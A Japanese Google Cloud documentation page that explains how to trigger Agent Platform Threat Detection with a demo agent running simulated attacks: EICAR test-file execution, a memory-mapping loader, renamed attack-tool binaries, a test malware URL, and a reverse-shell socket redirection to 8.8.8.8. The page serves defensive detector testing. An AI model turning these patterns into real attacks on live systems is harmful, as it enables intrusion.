このページでは、検出機能を意図的にトリガーして検出結果をチェックすることで、Agent Platform Threat Detection の動作を確認する方法について説明します。Agent Platform Threat Detection は、Security Command Center の組み込みサービスです。
始める前に
Agent Runtime エージェントに対する潜在的な脅威を検出するには、 Security Command Center で Agent Platform Threat Detection サービスが有効になっていること を確認します。
環境を設定する
Agent Platform Threat Detection をテストするには、悪意のあるアクティビティをシミュレートするデモ エージェントを設定します。
プロジェクトを作成してシェルをアクティブにする
テストに使用する Google Cloud プロジェクトを選択または作成します。
検出機能をテストするには、 Google Cloud コンソールと Cloud Shell を使用します。
コンソールに移動します。Google Cloud
テストに使用するプロジェクトを選択します。
[Cloud Shell をアクティブにする] をクリックします。
ローカルシェルからテスト手順を実行することもできます。
Agent Runtime を設定する
このプロジェクトで Agent Runtime を使用したことがない場合は、 開始する前に Agent Runtime 環境を設定します。作成した Cloud Storage ステージング バケットの名前を記録します。また、Agent Runtime クイックスタートに沿って、Vertex AI SDK でエージェントを開発 してデプロイする方法を学習することをおすすめします。
テスト スクリプトを作成する
テスト用の新しいエージェントをデプロイするために使用するファイルをいくつか作成します。これには、nano などのテキスト エディタを使用します。
次の内容で
requirements.txtという名前の新しいファイルを作成します。google-cloud-aiplatform[agent_engines] google-adk google-genai aiohttp cloudpickle pydanticinstallation_scripts/install.shという名前の新しい空のファイルを作成します。一部のテストでは、このファイルにコンテンツを追加する必要があります。次の内容で
main.pyという名前の新しいファイルを作成します。PROJECT_ID、LOCATION、STAGING_BUCKET変数を置き換えます。ステージング バケット名にはgs://接頭辞を含める必要があります。import asyncio import os import subprocess import socket import vertexai from vertexai import Client, agent_engines from google.adk.agents import llm_agent from google.adk.sessions.in_memory_session_service import InMemorySessionService # Replace with your own project, location, and staging bucket. LOCATION = "LOCATION" PROJECT_ID = "PROJECT_ID" # Staging bucket must have gs:// prefix STAGING_BUCKET = "STAGING_BUCKET" client = Client(project=PROJECT_ID, location=LOCATION) def _run_command(args, **kwargs): output = f"Called {' '.join(args)}\n" try: res = subprocess.run(args, capture_output=True, text=True, **kwargs) if res.stdout: output += f"Result: {res.stdout.strip()}\n" if res.stderr: output += f"Error: {res.stderr.strip()}\n" except subprocess.TimeoutExpired: output += "Command timed out as expected." return output # Tool to simulate threats. The function body will be replaced for individual # detector tests. def threat_detection_test(): output = _run_command(["sleep", "60"]) output += _run_command(["echo", "this is a fake threat"]) output += _run_command(["sleep", "10"]) return output root_agent = llm_agent.Agent( model="gemini-2.5-flash", name="threat_detection_test_agent", description="Runs threat detection test.", instruction=""" You are an agent that runs a threat detection test using a fake malicious command. """, tools=[threat_detection_test], ) async def main(): vertexai.init( project=PROJECT_ID, location=LOCATION, staging_bucket=STAGING_BUCKET, ) app = agent_engines.AdkApp( agent=root_agent, session_service_builder=InMemorySessionService ) remote_agent = client.agent_engines.create( agent=app, config={ "display_name": "scc_threat_test_agent", "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY, "requirements": [ "google-cloud-aiplatform[agent_engines,adk]", "cloudpickle", "pydantic", ], "staging_bucket": STAGING_BUCKET, "extra_packages": [ "installation_scripts/install.sh", ], }, ) print("Deployed agent: ", remote_agent.api_resource.name) try: async for event in remote_agent.async_stream_query( user_id="threat_detection_tester", message="Run the threat detection test", ): print(event) finally: client.agent_engines.delete(name=remote_agent.api_resource.name, force=True) if __name__ == "__main__": asyncio.run(main())
仮想環境を設定する
Python 仮想環境を作成してアクティブにします。
python3 -m venv env source env/bin/activate必要な依存関係を仮想環境にインストールします。
pip install -r requirements.txt
スクリプトをテストする
python3 main.py を使用して、仮想環境内からスクリプトを実行します。このコマンドは、テスト エージェントのビルド、デプロイ、実行に数分かかります。
スクリプトは、デプロイされたエージェントのリソース名と、LLM レスポンスやその他のメタデータを含むいくつかの JSON オブジェクトを出力します。この段階で 権限エラーやデプロイ エラーが発生した場合は、 トラブルシューティングで次の 手順を確認してください。
検出機能をテストする
Agent Platform Threat Detection の検出機能をテストするには、threat_detection_test
関数のコードを、攻撃をシミュレートするコードに置き換えます。スクリプトのデプロイとエージェントのクエリに時間がかかることがあります。テストを高速化するには、これらの関数の内容を組み合わせて使用します。
実行: 追加された悪意のあるバイナリの実行
テスト スクリプトの threat_detection_test 関数を置き換えてから、テスト スクリプトを実行します。
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output += _run_command(["touch", "/tmp/test_mal_file"])
with open("/tmp/test_mal_file", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
output += _run_command(["sleep", "10"])
return output
実行: 追加された悪意のあるライブラリの読み込み
テスト スクリプトの threat_detection_test 関数を置き換えてから、テスト スクリプトを実行します。レスポンスの解析に関するエラーが Vertex AI SDK から返されることがありますが、検出結果は生成されます。
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
with open("/tmp/test_mal_lib", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
output += _run_command(["sleep", "10"])
return output
実行: コンテナ エスケープ
テスト スクリプトの threat_detection_test 関数を置き換えてから、テスト スクリプトを実行します。
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
output += _run_command(["sleep", "10"])
return output
実行: Kubernetes 攻撃ツールの実行
テスト スクリプトの threat_detection_test 関数を置き換えてから、テスト スクリプトを実行します。
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
output += _run_command(["/tmp/amicontained"])
output += _run_command(["sleep", "10"])
return output
実行: ローカル偵察ツールの実行
テスト スクリプトの threat_detection_test 関数を置き換えてから、テスト スクリプトを実行します。
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
output += _run_command(["/tmp/linenum.sh"])
output += _run_command(["sleep", "10"])
return output
実行: 変更された悪意のあるバイナリの実行
Replace the `threat_detection_test` function in the test script, and then run the
test script.
```python
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```
実行: 変更された悪意のあるライブラリの読み込み
テスト スクリプトの threat_detection_test 関数を置き換えてから、テスト スクリプトを実行します。
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
output += _run_command(["sleep", "10"])
return output
悪意のある URL の観測
installation_scripts/install.sh ファイルを次の内容で更新します。
#!/bin/bash
apt-get install -y curl --no-install-recommends
テスト スクリプトの threat_detection_test 関数を置き換えてから、テスト スクリプトを実行します。
def threat_detection_test():
url = "https://testsafebrowsing.appspot.com/s/malware.html"
output = _run_command(["sleep", "60"])
output += _run_command(["curl", url])
output += _run_command(["sleep", "10"])
return output
リバースシェル
テスト スクリプトの threat_detection_test 関数を置き換えてから、テスト スクリプトを実行します。
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("8.8.8.8", 53))
subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
output += _run_command(["sleep", "10"])
return output
次のステップ
- Agent Platform Threat Detection の詳細を確認する 。
- Agent Platform Threat Detection を使用する方法を学習する 。